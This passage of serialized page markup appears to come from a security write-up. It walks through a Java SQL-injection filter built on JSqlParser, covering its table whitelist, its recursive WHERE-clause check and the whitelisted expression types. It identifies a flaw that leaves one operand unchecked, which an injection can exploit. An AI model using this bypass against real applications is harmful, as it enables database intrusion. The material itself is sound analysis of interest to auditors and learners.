",{"type":32,"tag":83,"props":1163,"children":1164},{"style":427},[1165],{"type":38,"value":1166},"var3",{"type":32,"tag":83,"props":1168,"children":1169},{"style":433},[1170],{"type":38,"value":869},{"type":32,"tag":83,"props":1172,"children":1173},{"style":433},[1174],{"type":38,"value":874},{"type":32,"tag":83,"props":1176,"children":1177},{"class":85,"line":204},[1178,1183,1187,1192],{"type":32,"tag":83,"props":1179,"children":1180},{"style":427},[1181],{"type":38,"value":1182},"    
var3",{"type":32,"tag":83,"props":1184,"children":1185},{"style":433},[1186],{"type":38,"value":629},{"type":32,"tag":83,"props":1188,"children":1189},{"style":576},[1190],{"type":38,"value":1191},"printStackTrace",{"type":32,"tag":83,"props":1193,"children":1194},{"style":433},[1195],{"type":38,"value":918},{"type":32,"tag":83,"props":1197,"children":1198},{"class":85,"line":218},[1199,1204,1208,1213,1217,1221,1226,1230],{"type":32,"tag":83,"props":1200,"children":1201},{"style":90},[1202],{"type":38,"value":1203},"      throw",{"type":32,"tag":83,"props":1205,"children":1206},{"style":90},[1207],{"type":38,"value":908},{"type":32,"tag":83,"props":1209,"children":1210},{"style":576},[1211],{"type":38,"value":1212}," SQLException",{"type":32,"tag":83,"props":1214,"children":1215},{"style":433},[1216],{"type":38,"value":584},{"type":32,"tag":83,"props":1218,"children":1219},{"style":439},[1220],{"type":38,"value":452},{"type":32,"tag":83,"props":1222,"children":1223},{"style":338},[1224],{"type":38,"value":1225},"SQL error",{"type":32,"tag":83,"props":1227,"children":1228},{"style":439},[1229],{"type":38,"value":452},{"type":32,"tag":83,"props":1231,"children":1232},{"style":433},[1233],{"type":38,"value":1048},{"type":32,"tag":83,"props":1235,"children":1236},{"class":85,"line":230},[1237],{"type":32,"tag":83,"props":1238,"children":1239},{"style":433},[1240],{"type":38,"value":1241},"  }\n",{"type":32,"tag":83,"props":1243,"children":1244},{"class":85,"line":238},[1245],{"type":32,"tag":83,"props":1246,"children":1247},{"style":433},[1248],{"type":38,"value":1249},"}\n",{"type":32,"tag":47,"props":1251,"children":1252},{},[1253],{"type":38,"value":1254},"In our case, it will process the select part of the request, verify that it is indeed an instance of plainselect, then check the from part which will verify that this part contains a table 
name.",{"type":32,"tag":68,"props":1256,"children":1257},{"lang":407},[1258],{"type":32,"tag":73,"props":1259,"children":1261},{"code":1260,"language":407,"meta":7,"className":412,"style":7},"private static boolean processSelect(Select statement) {\n  SelectBody selectBody = statement.getSelectBody();\n  if (selectBody instanceof PlainSelect) {\n      PlainSelect plainSelect = (PlainSelect)selectBody;\n      FromItem fromItem = plainSelect.getFromItem();\n      if (fromItem instanceof Table) {\n        String tablename = ((Table)fromItem).getName();\n        List\u003CString> whiteTable = SQLCheck.getWhiteTable();\n\n        if (!whiteTable.contains(tablename)) {\n            return false;\n        }\n        BinaryExpression expression = (BinaryExpression)plainSelect.getWhere();\n\n        if (!restrictExpr(expression)) {\n            return false;\n        }\n        return true;\n      }\n  }\n  return false;\n}\n",[1262],{"type":32,"tag":79,"props":1263,"children":1264},{"__ignoreMap":7},[1265,1302,1336,1370,1409,1443,1476,1526,1575,1582,1631,1647,1655,1703,1710,1747,1762,1769,1785,1792,1799,1815],{"type":32,"tag":83,"props":1266,"children":1267},{"class":85,"line":86},[1268,1273,1277,1281,1285,1289,1294,1298],{"type":32,"tag":83,"props":1269,"children":1270},{"style":455},[1271],{"type":38,"value":1272},"private",{"type":32,"tag":83,"props":1274,"children":1275},{"style":455},[1276],{"type":38,"value":845},{"type":32,"tag":83,"props":1278,"children":1279},{"style":455},[1280],{"type":38,"value":850},{"type":32,"tag":83,"props":1282,"children":1283},{"style":576},[1284],{"type":38,"value":1024},{"type":32,"tag":83,"props":1286,"children":1287},{"style":433},[1288],{"type":38,"value":584},{"type":32,"tag":83,"props":1290,"children":1291},{"style":96},[1292],{"type":38,"value":1293},"Select 
statement",{"type":32,"tag":83,"props":1295,"children":1296},{"style":433},[1297],{"type":38,"value":869},{"type":32,"tag":83,"props":1299,"children":1300},{"style":433},[1301],{"type":38,"value":874},{"type":32,"tag":83,"props":1303,"children":1304},{"class":85,"line":102},[1305,1310,1315,1319,1323,1327,1332],{"type":32,"tag":83,"props":1306,"children":1307},{"style":96},[1308],{"type":38,"value":1309},"  SelectBody",{"type":32,"tag":83,"props":1311,"children":1312},{"style":427},[1313],{"type":38,"value":1314}," selectBody",{"type":32,"tag":83,"props":1316,"children":1317},{"style":433},[1318],{"type":38,"value":436},{"type":32,"tag":83,"props":1320,"children":1321},{"style":427},[1322],{"type":38,"value":931},{"type":32,"tag":83,"props":1324,"children":1325},{"style":433},[1326],{"type":38,"value":629},{"type":32,"tag":83,"props":1328,"children":1329},{"style":576},[1330],{"type":38,"value":1331},"getSelectBody",{"type":32,"tag":83,"props":1333,"children":1334},{"style":433},[1335],{"type":38,"value":918},{"type":32,"tag":83,"props":1337,"children":1338},{"class":85,"line":112},[1339,1344,1348,1353,1357,1362,1366],{"type":32,"tag":83,"props":1340,"children":1341},{"style":90},[1342],{"type":38,"value":1343},"  if",{"type":32,"tag":83,"props":1345,"children":1346},{"style":433},[1347],{"type":38,"value":988},{"type":32,"tag":83,"props":1349,"children":1350},{"style":96},[1351],{"type":38,"value":1352},"selectBody ",{"type":32,"tag":83,"props":1354,"children":1355},{"style":455},[1356],{"type":38,"value":998},{"type":32,"tag":83,"props":1358,"children":1359},{"style":96},[1360],{"type":38,"value":1361}," 
PlainSelect",{"type":32,"tag":83,"props":1363,"children":1364},{"style":433},[1365],{"type":38,"value":869},{"type":32,"tag":83,"props":1367,"children":1368},{"style":433},[1369],{"type":38,"value":874},{"type":32,"tag":83,"props":1371,"children":1372},{"class":85,"line":126},[1373,1378,1383,1387,1391,1396,1400,1405],{"type":32,"tag":83,"props":1374,"children":1375},{"style":96},[1376],{"type":38,"value":1377},"      PlainSelect",{"type":32,"tag":83,"props":1379,"children":1380},{"style":427},[1381],{"type":38,"value":1382}," plainSelect",{"type":32,"tag":83,"props":1384,"children":1385},{"style":433},[1386],{"type":38,"value":436},{"type":32,"tag":83,"props":1388,"children":1389},{"style":433},[1390],{"type":38,"value":988},{"type":32,"tag":83,"props":1392,"children":1393},{"style":96},[1394],{"type":38,"value":1395},"PlainSelect",{"type":32,"tag":83,"props":1397,"children":1398},{"style":433},[1399],{"type":38,"value":869},{"type":32,"tag":83,"props":1401,"children":1402},{"style":96},[1403],{"type":38,"value":1404},"selectBody",{"type":32,"tag":83,"props":1406,"children":1407},{"style":433},[1408],{"type":38,"value":486},{"type":32,"tag":83,"props":1410,"children":1411},{"class":85,"line":135},[1412,1417,1422,1426,1430,1434,1439],{"type":32,"tag":83,"props":1413,"children":1414},{"style":96},[1415],{"type":38,"value":1416},"      FromItem",{"type":32,"tag":83,"props":1418,"children":1419},{"style":427},[1420],{"type":38,"value":1421}," 
fromItem",{"type":32,"tag":83,"props":1423,"children":1424},{"style":433},[1425],{"type":38,"value":436},{"type":32,"tag":83,"props":1427,"children":1428},{"style":427},[1429],{"type":38,"value":1382},{"type":32,"tag":83,"props":1431,"children":1432},{"style":433},[1433],{"type":38,"value":629},{"type":32,"tag":83,"props":1435,"children":1436},{"style":576},[1437],{"type":38,"value":1438},"getFromItem",{"type":32,"tag":83,"props":1440,"children":1441},{"style":433},[1442],{"type":38,"value":918},{"type":32,"tag":83,"props":1444,"children":1445},{"class":85,"line":148},[1446,1450,1454,1459,1463,1468,1472],{"type":32,"tag":83,"props":1447,"children":1448},{"style":90},[1449],{"type":38,"value":983},{"type":32,"tag":83,"props":1451,"children":1452},{"style":433},[1453],{"type":38,"value":988},{"type":32,"tag":83,"props":1455,"children":1456},{"style":96},[1457],{"type":38,"value":1458},"fromItem ",{"type":32,"tag":83,"props":1460,"children":1461},{"style":455},[1462],{"type":38,"value":998},{"type":32,"tag":83,"props":1464,"children":1465},{"style":96},[1466],{"type":38,"value":1467}," Table",{"type":32,"tag":83,"props":1469,"children":1470},{"style":433},[1471],{"type":38,"value":869},{"type":32,"tag":83,"props":1473,"children":1474},{"style":433},[1475],{"type":38,"value":874},{"type":32,"tag":83,"props":1477,"children":1478},{"class":85,"line":161},[1479,1484,1489,1493,1498,1503,1507,1512,1517,1522],{"type":32,"tag":83,"props":1480,"children":1481},{"style":96},[1482],{"type":38,"value":1483},"        String",{"type":32,"tag":83,"props":1485,"children":1486},{"style":427},[1487],{"type":38,"value":1488}," tablename",{"type":32,"tag":83,"props":1490,"children":1491},{"style":433},[1492],{"type":38,"value":436},{"type":32,"tag":83,"props":1494,"children":1495},{"style":433},[1496],{"type":38,"value":1497}," 
((",{"type":32,"tag":83,"props":1499,"children":1500},{"style":96},[1501],{"type":38,"value":1502},"Table",{"type":32,"tag":83,"props":1504,"children":1505},{"style":433},[1506],{"type":38,"value":869},{"type":32,"tag":83,"props":1508,"children":1509},{"style":96},[1510],{"type":38,"value":1511},"fromItem",{"type":32,"tag":83,"props":1513,"children":1514},{"style":433},[1515],{"type":38,"value":1516},").",{"type":32,"tag":83,"props":1518,"children":1519},{"style":576},[1520],{"type":38,"value":1521},"getName",{"type":32,"tag":83,"props":1523,"children":1524},{"style":433},[1525],{"type":38,"value":918},{"type":32,"tag":83,"props":1527,"children":1528},{"class":85,"line":169},[1529,1534,1539,1543,1548,1553,1557,1562,1566,1571],{"type":32,"tag":83,"props":1530,"children":1531},{"style":96},[1532],{"type":38,"value":1533},"        List",{"type":32,"tag":83,"props":1535,"children":1536},{"style":433},[1537],{"type":38,"value":1538},"\u003C",{"type":32,"tag":83,"props":1540,"children":1541},{"style":455},[1542],{"type":38,"value":424},{"type":32,"tag":83,"props":1544,"children":1545},{"style":433},[1546],{"type":38,"value":1547},">",{"type":32,"tag":83,"props":1549,"children":1550},{"style":427},[1551],{"type":38,"value":1552}," whiteTable",{"type":32,"tag":83,"props":1554,"children":1555},{"style":433},[1556],{"type":38,"value":436},{"type":32,"tag":83,"props":1558,"children":1559},{"style":427},[1560],{"type":38,"value":1561}," 
SQLCheck",{"type":32,"tag":83,"props":1563,"children":1564},{"style":433},[1565],{"type":38,"value":629},{"type":32,"tag":83,"props":1567,"children":1568},{"style":576},[1569],{"type":38,"value":1570},"getWhiteTable",{"type":32,"tag":83,"props":1572,"children":1573},{"style":433},[1574],{"type":38,"value":918},{"type":32,"tag":83,"props":1576,"children":1577},{"class":85,"line":183},[1578],{"type":32,"tag":83,"props":1579,"children":1580},{"emptyLinePlaceholder":106},[1581],{"type":38,"value":109},{"type":32,"tag":83,"props":1583,"children":1584},{"class":85,"line":196},[1585,1590,1594,1599,1604,1608,1613,1617,1622,1627],{"type":32,"tag":83,"props":1586,"children":1587},{"style":90},[1588],{"type":38,"value":1589},"        if",{"type":32,"tag":83,"props":1591,"children":1592},{"style":433},[1593],{"type":38,"value":988},{"type":32,"tag":83,"props":1595,"children":1596},{"style":455},[1597],{"type":38,"value":1598},"!",{"type":32,"tag":83,"props":1600,"children":1601},{"style":427},[1602],{"type":38,"value":1603},"whiteTable",{"type":32,"tag":83,"props":1605,"children":1606},{"style":433},[1607],{"type":38,"value":629},{"type":32,"tag":83,"props":1609,"children":1610},{"style":576},[1611],{"type":38,"value":1612},"contains",{"type":32,"tag":83,"props":1614,"children":1615},{"style":433},[1616],{"type":38,"value":584},{"type":32,"tag":83,"props":1618,"children":1619},{"style":96},[1620],{"type":38,"value":1621},"tablename",{"type":32,"tag":83,"props":1623,"children":1624},{"style":433},[1625],{"type":38,"value":1626},"))",{"type":32,"tag":83,"props":1628,"children":1629},{"style":433},[1630],{"type":38,"value":874},{"type":32,"tag":83,"props":1632,"children":1633},{"class":85,"line":204},[1634,1639,1643],{"type":32,"tag":83,"props":1635,"children":1636},{"style":90},[1637],{"type":38,"value":1638},"            
return",{"type":32,"tag":83,"props":1640,"children":1641},{"style":90},[1642],{"type":38,"value":1127},{"type":32,"tag":83,"props":1644,"children":1645},{"style":433},[1646],{"type":38,"value":486},{"type":32,"tag":83,"props":1648,"children":1649},{"class":85,"line":218},[1650],{"type":32,"tag":83,"props":1651,"children":1652},{"style":433},[1653],{"type":38,"value":1654},"        }\n",{"type":32,"tag":83,"props":1656,"children":1657},{"class":85,"line":230},[1658,1663,1668,1672,1676,1681,1685,1690,1694,1699],{"type":32,"tag":83,"props":1659,"children":1660},{"style":96},[1661],{"type":38,"value":1662},"        BinaryExpression",{"type":32,"tag":83,"props":1664,"children":1665},{"style":427},[1666],{"type":38,"value":1667}," expression",{"type":32,"tag":83,"props":1669,"children":1670},{"style":433},[1671],{"type":38,"value":436},{"type":32,"tag":83,"props":1673,"children":1674},{"style":433},[1675],{"type":38,"value":988},{"type":32,"tag":83,"props":1677,"children":1678},{"style":96},[1679],{"type":38,"value":1680},"BinaryExpression",{"type":32,"tag":83,"props":1682,"children":1683},{"style":433},[1684],{"type":38,"value":869},{"type":32,"tag":83,"props":1686,"children":1687},{"style":427},[1688],{"type":38,"value":1689},"plainSelect",{"type":32,"tag":83,"props":1691,"children":1692},{"style":433},[1693],{"type":38,"value":629},{"type":32,"tag":83,"props":1695,"children":1696},{"style":576},[1697],{"type":38,"value":1698},"getWhere",{"type":32,"tag":83,"props":1700,"children":1701},{"style":433},[1702],{"type":38,"value":918},{"type":32,"tag":83,"props":1704,"children":1705},{"class":85,"line":238},[1706],{"type":32,"tag":83,"props":1707,"children":1708},{"emptyLinePlaceholder":106},[1709],{"type":38,"value":109},{"type":32,"tag":83,"props":1711,"children":1712},{"class":85,"line":251},[1713,1717,1721,1725,1730,1734,1739,1743],{"type":32,"tag":83,"props":1714,"children":1715},{"style":90},[1716],{"type":38,"value":1589},{"type":32,"tag":83,"props":1718,"children":1
719},{"style":433},[1720],{"type":38,"value":988},{"type":32,"tag":83,"props":1722,"children":1723},{"style":455},[1724],{"type":38,"value":1598},{"type":32,"tag":83,"props":1726,"children":1727},{"style":576},[1728],{"type":38,"value":1729},"restrictExpr",{"type":32,"tag":83,"props":1731,"children":1732},{"style":433},[1733],{"type":38,"value":584},{"type":32,"tag":83,"props":1735,"children":1736},{"style":96},[1737],{"type":38,"value":1738},"expression",{"type":32,"tag":83,"props":1740,"children":1741},{"style":433},[1742],{"type":38,"value":1626},{"type":32,"tag":83,"props":1744,"children":1745},{"style":433},[1746],{"type":38,"value":874},{"type":32,"tag":83,"props":1748,"children":1749},{"class":85,"line":264},[1750,1754,1758],{"type":32,"tag":83,"props":1751,"children":1752},{"style":90},[1753],{"type":38,"value":1638},{"type":32,"tag":83,"props":1755,"children":1756},{"style":90},[1757],{"type":38,"value":1127},{"type":32,"tag":83,"props":1759,"children":1760},{"style":433},[1761],{"type":38,"value":486},{"type":32,"tag":83,"props":1763,"children":1764},{"class":85,"line":277},[1765],{"type":32,"tag":83,"props":1766,"children":1767},{"style":433},[1768],{"type":38,"value":1654},{"type":32,"tag":83,"props":1770,"children":1771},{"class":85,"line":285},[1772,1776,1781],{"type":32,"tag":83,"props":1773,"children":1774},{"style":90},[1775],{"type":38,"value":1019},{"type":32,"tag":83,"props":1777,"children":1778},{"style":90},[1779],{"type":38,"value":1780}," 
true",{"type":32,"tag":83,"props":1782,"children":1783},{"style":433},[1784],{"type":38,"value":486},{"type":32,"tag":83,"props":1786,"children":1787},{"class":85,"line":298},[1788],{"type":32,"tag":83,"props":1789,"children":1790},{"style":433},[1791],{"type":38,"value":1139},{"type":32,"tag":83,"props":1793,"children":1794},{"class":85,"line":311},[1795],{"type":32,"tag":83,"props":1796,"children":1797},{"style":433},[1798],{"type":38,"value":1241},{"type":32,"tag":83,"props":1800,"children":1801},{"class":85,"line":324},[1802,1807,1811],{"type":32,"tag":83,"props":1803,"children":1804},{"style":90},[1805],{"type":38,"value":1806},"  return",{"type":32,"tag":83,"props":1808,"children":1809},{"style":90},[1810],{"type":38,"value":1127},{"type":32,"tag":83,"props":1812,"children":1813},{"style":433},[1814],{"type":38,"value":486},{"type":32,"tag":83,"props":1816,"children":1818},{"class":85,"line":1817},22,[1819],{"type":32,"tag":83,"props":1820,"children":1821},{"style":433},[1822],{"type":38,"value":1249},{"type":32,"tag":47,"props":1824,"children":1825},{},[1826,1828,1833,1835,1841,1843,1848],{"type":38,"value":1827},"Next, the function will check the last part, namely, the where part of the query. 
For this, it will retrieve the entire where clause with the ",{"type":32,"tag":79,"props":1829,"children":1831},{"className":1830},[],[1832],{"type":38,"value":1698},{"type":38,"value":1834}," function from the library ",{"type":32,"tag":79,"props":1836,"children":1838},{"className":1837},[],[1839],{"type":38,"value":1840},"net.sf.jsqlparser.expression",{"type":38,"value":1842}," and call the function ",{"type":32,"tag":79,"props":1844,"children":1846},{"className":1845},[],[1847],{"type":38,"value":1729},{"type":38,"value":629},{"type":32,"tag":47,"props":1850,"children":1851},{},[1852],{"type":38,"value":1853},"The first three checks are not of interest to us because they pass in our case, given that we have not altered these parts of the query.",{"type":32,"tag":47,"props":1855,"children":1856},{},[1857,1859,1864],{"type":38,"value":1858},"Here, since we injected into the where clause, it is the filter on that clause that must be bypassed. If we look closely at the ",{"type":32,"tag":79,"props":1860,"children":1862},{"className":1861},[],[1863],{"type":38,"value":1729},{"type":38,"value":1865}," function. 
We can see that this recursive function retrieves the right part and the left part of the where part of the query.",{"type":32,"tag":68,"props":1867,"children":1868},{"lang":407},[1869],{"type":32,"tag":73,"props":1870,"children":1872},{"code":1871,"language":407,"meta":7,"className":412,"style":7},"private static boolean restrictExpr(BinaryExpression expression) {\n  Expression left_expr = expression.getLeftExpression();\n  Expression right_expr = expression.getRightExpression();\n  if (left_expr instanceof BinaryExpression) {\n      return restrictExpr((BinaryExpression)left_expr);\n  } else if (right_expr instanceof BinaryExpression) {\n      return restrictExpr((BinaryExpression)right_expr);\n  } else {\n      List arrays = Arrays.asList(restrictExprCls);         \n      return arrays.contains(left_expr.getClass()) && arrays.contains(right_expr.getClass());\n  }\n}\n",[1873],{"type":32,"tag":79,"props":1874,"children":1875},{"__ignoreMap":7},[1876,1913,1947,1980,2013,2046,2087,2119,2134,2184,2263,2270],{"type":32,"tag":83,"props":1877,"children":1878},{"class":85,"line":86},[1879,1883,1887,1891,1896,1900,1905,1909],{"type":32,"tag":83,"props":1880,"children":1881},{"style":455},[1882],{"type":38,"value":1272},{"type":32,"tag":83,"props":1884,"children":1885},{"style":455},[1886],{"type":38,"value":845},{"type":32,"tag":83,"props":1888,"children":1889},{"style":455},[1890],{"type":38,"value":850},{"type":32,"tag":83,"props":1892,"children":1893},{"style":576},[1894],{"type":38,"value":1895}," restrictExpr",{"type":32,"tag":83,"props":1897,"children":1898},{"style":433},[1899],{"type":38,"value":584},{"type":32,"tag":83,"props":1901,"children":1902},{"style":96},[1903],{"type":38,"value":1904},"BinaryExpression 
expression",{"type":32,"tag":83,"props":1906,"children":1907},{"style":433},[1908],{"type":38,"value":869},{"type":32,"tag":83,"props":1910,"children":1911},{"style":433},[1912],{"type":38,"value":874},{"type":32,"tag":83,"props":1914,"children":1915},{"class":85,"line":102},[1916,1921,1926,1930,1934,1938,1943],{"type":32,"tag":83,"props":1917,"children":1918},{"style":96},[1919],{"type":38,"value":1920},"  Expression",{"type":32,"tag":83,"props":1922,"children":1923},{"style":427},[1924],{"type":38,"value":1925}," left_expr",{"type":32,"tag":83,"props":1927,"children":1928},{"style":433},[1929],{"type":38,"value":436},{"type":32,"tag":83,"props":1931,"children":1932},{"style":427},[1933],{"type":38,"value":1667},{"type":32,"tag":83,"props":1935,"children":1936},{"style":433},[1937],{"type":38,"value":629},{"type":32,"tag":83,"props":1939,"children":1940},{"style":576},[1941],{"type":38,"value":1942},"getLeftExpression",{"type":32,"tag":83,"props":1944,"children":1945},{"style":433},[1946],{"type":38,"value":918},{"type":32,"tag":83,"props":1948,"children":1949},{"class":85,"line":112},[1950,1954,1959,1963,1967,1971,1976],{"type":32,"tag":83,"props":1951,"children":1952},{"style":96},[1953],{"type":38,"value":1920},{"type":32,"tag":83,"props":1955,"children":1956},{"style":427},[1957],{"type":38,"value":1958}," 
right_expr",{"type":32,"tag":83,"props":1960,"children":1961},{"style":433},[1962],{"type":38,"value":436},{"type":32,"tag":83,"props":1964,"children":1965},{"style":427},[1966],{"type":38,"value":1667},{"type":32,"tag":83,"props":1968,"children":1969},{"style":433},[1970],{"type":38,"value":629},{"type":32,"tag":83,"props":1972,"children":1973},{"style":576},[1974],{"type":38,"value":1975},"getRightExpression",{"type":32,"tag":83,"props":1977,"children":1978},{"style":433},[1979],{"type":38,"value":918},{"type":32,"tag":83,"props":1981,"children":1982},{"class":85,"line":126},[1983,1987,1991,1996,2000,2005,2009],{"type":32,"tag":83,"props":1984,"children":1985},{"style":90},[1986],{"type":38,"value":1343},{"type":32,"tag":83,"props":1988,"children":1989},{"style":433},[1990],{"type":38,"value":988},{"type":32,"tag":83,"props":1992,"children":1993},{"style":96},[1994],{"type":38,"value":1995},"left_expr ",{"type":32,"tag":83,"props":1997,"children":1998},{"style":455},[1999],{"type":38,"value":998},{"type":32,"tag":83,"props":2001,"children":2002},{"style":96},[2003],{"type":38,"value":2004}," BinaryExpression",{"type":32,"tag":83,"props":2006,"children":2007},{"style":433},[2008],{"type":38,"value":869},{"type":32,"tag":83,"props":2010,"children":2011},{"style":433},[2012],{"type":38,"value":874},{"type":32,"tag":83,"props":2014,"children":2015},{"class":85,"line":135},[2016,2021,2025,2029,2033,2037,2042],{"type":32,"tag":83,"props":2017,"children":2018},{"style":90},[2019],{"type":38,"value":2020},"      
return",{"type":32,"tag":83,"props":2022,"children":2023},{"style":576},[2024],{"type":38,"value":1895},{"type":32,"tag":83,"props":2026,"children":2027},{"style":433},[2028],{"type":38,"value":1029},{"type":32,"tag":83,"props":2030,"children":2031},{"style":96},[2032],{"type":38,"value":1680},{"type":32,"tag":83,"props":2034,"children":2035},{"style":433},[2036],{"type":38,"value":869},{"type":32,"tag":83,"props":2038,"children":2039},{"style":96},[2040],{"type":38,"value":2041},"left_expr",{"type":32,"tag":83,"props":2043,"children":2044},{"style":433},[2045],{"type":38,"value":1048},{"type":32,"tag":83,"props":2047,"children":2048},{"class":85,"line":148},[2049,2053,2057,2062,2066,2071,2075,2079,2083],{"type":32,"tag":83,"props":2050,"children":2051},{"style":433},[2052],{"type":38,"value":1147},{"type":32,"tag":83,"props":2054,"children":2055},{"style":90},[2056],{"type":38,"value":1061},{"type":32,"tag":83,"props":2058,"children":2059},{"style":90},[2060],{"type":38,"value":2061}," if",{"type":32,"tag":83,"props":2063,"children":2064},{"style":433},[2065],{"type":38,"value":988},{"type":32,"tag":83,"props":2067,"children":2068},{"style":96},[2069],{"type":38,"value":2070},"right_expr 
",{"type":32,"tag":83,"props":2072,"children":2073},{"style":455},[2074],{"type":38,"value":998},{"type":32,"tag":83,"props":2076,"children":2077},{"style":96},[2078],{"type":38,"value":2004},{"type":32,"tag":83,"props":2080,"children":2081},{"style":433},[2082],{"type":38,"value":869},{"type":32,"tag":83,"props":2084,"children":2085},{"style":433},[2086],{"type":38,"value":874},{"type":32,"tag":83,"props":2088,"children":2089},{"class":85,"line":161},[2090,2094,2098,2102,2106,2110,2115],{"type":32,"tag":83,"props":2091,"children":2092},{"style":90},[2093],{"type":38,"value":2020},{"type":32,"tag":83,"props":2095,"children":2096},{"style":576},[2097],{"type":38,"value":1895},{"type":32,"tag":83,"props":2099,"children":2100},{"style":433},[2101],{"type":38,"value":1029},{"type":32,"tag":83,"props":2103,"children":2104},{"style":96},[2105],{"type":38,"value":1680},{"type":32,"tag":83,"props":2107,"children":2108},{"style":433},[2109],{"type":38,"value":869},{"type":32,"tag":83,"props":2111,"children":2112},{"style":96},[2113],{"type":38,"value":2114},"right_expr",{"type":32,"tag":83,"props":2116,"children":2117},{"style":433},[2118],{"type":38,"value":1048},{"type":32,"tag":83,"props":2120,"children":2121},{"class":85,"line":169},[2122,2126,2130],{"type":32,"tag":83,"props":2123,"children":2124},{"style":433},[2125],{"type":38,"value":1147},{"type":32,"tag":83,"props":2127,"children":2128},{"style":90},[2129],{"type":38,"value":1061},{"type":32,"tag":83,"props":2131,"children":2132},{"style":433},[2133],{"type":38,"value":874},{"type":32,"tag":83,"props":2135,"children":2136},{"class":85,"line":183},[2137,2142,2147,2151,2156,2160,2165,2169,2174,2179],{"type":32,"tag":83,"props":2138,"children":2139},{"style":96},[2140],{"type":38,"value":2141},"      List",{"type":32,"tag":83,"props":2143,"children":2144},{"style":427},[2145],{"type":38,"value":2146}," 
arrays",{"type":32,"tag":83,"props":2148,"children":2149},{"style":433},[2150],{"type":38,"value":436},{"type":32,"tag":83,"props":2152,"children":2153},{"style":427},[2154],{"type":38,"value":2155}," Arrays",{"type":32,"tag":83,"props":2157,"children":2158},{"style":433},[2159],{"type":38,"value":629},{"type":32,"tag":83,"props":2161,"children":2162},{"style":576},[2163],{"type":38,"value":2164},"asList",{"type":32,"tag":83,"props":2166,"children":2167},{"style":433},[2168],{"type":38,"value":584},{"type":32,"tag":83,"props":2170,"children":2171},{"style":96},[2172],{"type":38,"value":2173},"restrictExprCls",{"type":32,"tag":83,"props":2175,"children":2176},{"style":433},[2177],{"type":38,"value":2178},");",{"type":32,"tag":83,"props":2180,"children":2181},{"style":96},[2182],{"type":38,"value":2183},"         \n",{"type":32,"tag":83,"props":2185,"children":2186},{"class":85,"line":196},[2187,2191,2195,2199,2203,2207,2211,2215,2220,2225,2230,2234,2238,2242,2246,2250,2254,2258],{"type":32,"tag":83,"props":2188,"children":2189},{"style":90},[2190],{"type":38,"value":2020},{"type":32,"tag":83,"props":2192,"children":2193},{"style":427},[2194],{"type":38,"value":2146},{"type":32,"tag":83,"props":2196,"children":2197},{"style":433},[2198],{"type":38,"value":629},{"type":32,"tag":83,"props":2200,"children":2201},{"style":576},[2202],{"type":38,"value":1612},{"type":32,"tag":83,"props":2204,"children":2205},{"style":433},[2206],{"type":38,"value":584},{"type":32,"tag":83,"props":2208,"children":2209},{"style":427},[2210],{"type":38,"value":2041},{"type":32,"tag":83,"props":2212,"children":2213},{"style":433},[2214],{"type":38,"value":629},{"type":32,"tag":83,"props":2216,"children":2217},{"style":576},[2218],{"type":38,"value":2219},"getClass",{"type":32,"tag":83,"props":2221,"children":2222},{"style":433},[2223],{"type":38,"value":2224},"())",{"type":32,"tag":83,"props":2226,"children":2227},{"style":455},[2228],{"type":38,"value":2229}," 
&&",{"type":32,"tag":83,"props":2231,"children":2232},{"style":427},[2233],{"type":38,"value":2146},{"type":32,"tag":83,"props":2235,"children":2236},{"style":433},[2237],{"type":38,"value":629},{"type":32,"tag":83,"props":2239,"children":2240},{"style":576},[2241],{"type":38,"value":1612},{"type":32,"tag":83,"props":2243,"children":2244},{"style":433},[2245],{"type":38,"value":584},{"type":32,"tag":83,"props":2247,"children":2248},{"style":427},[2249],{"type":38,"value":2114},{"type":32,"tag":83,"props":2251,"children":2252},{"style":433},[2253],{"type":38,"value":629},{"type":32,"tag":83,"props":2255,"children":2256},{"style":576},[2257],{"type":38,"value":2219},{"type":32,"tag":83,"props":2259,"children":2260},{"style":433},[2261],{"type":38,"value":2262},"());\n",{"type":32,"tag":83,"props":2264,"children":2265},{"class":85,"line":204},[2266],{"type":32,"tag":83,"props":2267,"children":2268},{"style":433},[2269],{"type":38,"value":1241},{"type":32,"tag":83,"props":2271,"children":2272},{"class":85,"line":218},[2273],{"type":32,"tag":83,"props":2274,"children":2275},{"style":433},[2276],{"type":38,"value":1249},{"type":32,"tag":47,"props":2278,"children":2279},{},[2280],{"type":38,"value":2281},"If one of the parts contains another part of where then the function will be reapplied. 
At the end of the recursion, if one of the two parts does not respect the whitelisted types then the query is not accepted. Note, however, that the function only descends into the operand that is itself a BinaryExpression (the left one first), so the other operand at that level is never inspected.",{"type":32,"tag":47,"props":2283,"children":2284},{},[2285],{"type":38,"value":2286},"The whitelisted types are:",{"type":32,"tag":68,"props":2288,"children":2289},{"lang":515},[2290],{"type":32,"tag":73,"props":2291,"children":2294},{"code":2292,"language":515,"meta":7,"className":2293,"style":7},"LongValue\nStringValue\nNullValue\nTimeValue\nTimestampValue\nDateValue\nDoubleValue\nColumn\n","language-txt shiki shiki-themes vitesse-dark",[2295],{"type":32,"tag":79,"props":2296,"children":2297},{"__ignoreMap":7},[2298,2306,2314,2322,2330,2338,2346,2354],{"type":32,"tag":83,"props":2299,"children":2300},{"class":85,"line":86},[2301],{"type":32,"tag":83,"props":2302,"children":2303},{},[2304],{"type":38,"value":2305},"LongValue\n",{"type":32,"tag":83,"props":2307,"children":2308},{"class":85,"line":102},[2309],{"type":32,"tag":83,"props":2310,"children":2311},{},[2312],{"type":38,"value":2313},"StringValue\n",{"type":32,"tag":83,"props":2315,"children":2316},{"class":85,"line":112},[2317],{"type":32,"tag":83,"props":2318,"children":2319},{},[2320],{"type":38,"value":2321},"NullValue\n",{"type":32,"tag":83,"props":2323,"children":2324},{"class":85,"line":126},[2325],{"type":32,"tag":83,"props":2326,"children":2327},{},[2328],{"type":38,"value":2329},"TimeValue\n",{"type":32,"tag":83,"props":2331,"children":2332},{"class":85,"line":135},[2333],{"type":32,"tag":83,"props":2334,"children":2335},{},[2336],{"type":38,"value":2337},"TimestampValue\n",{"type":32,"tag":83,"props":2339,"children":2340},{"class":85,"line":148},[2341],{"type":32,"tag":83,"props":2342,"children":2343},{},[2344],{"type":38,"value":2345},"DateValue\n",{"type":32,"tag":83,"props":2347,"children":2348},{"class":85,"line":161},[2349],{"type":32,"tag":83,"props":2350,"children":2351},{},[2352],{"type":38,"value":2353},"DoubleValue\n",{"type":32,"tag":83,"props":2355,"children":235
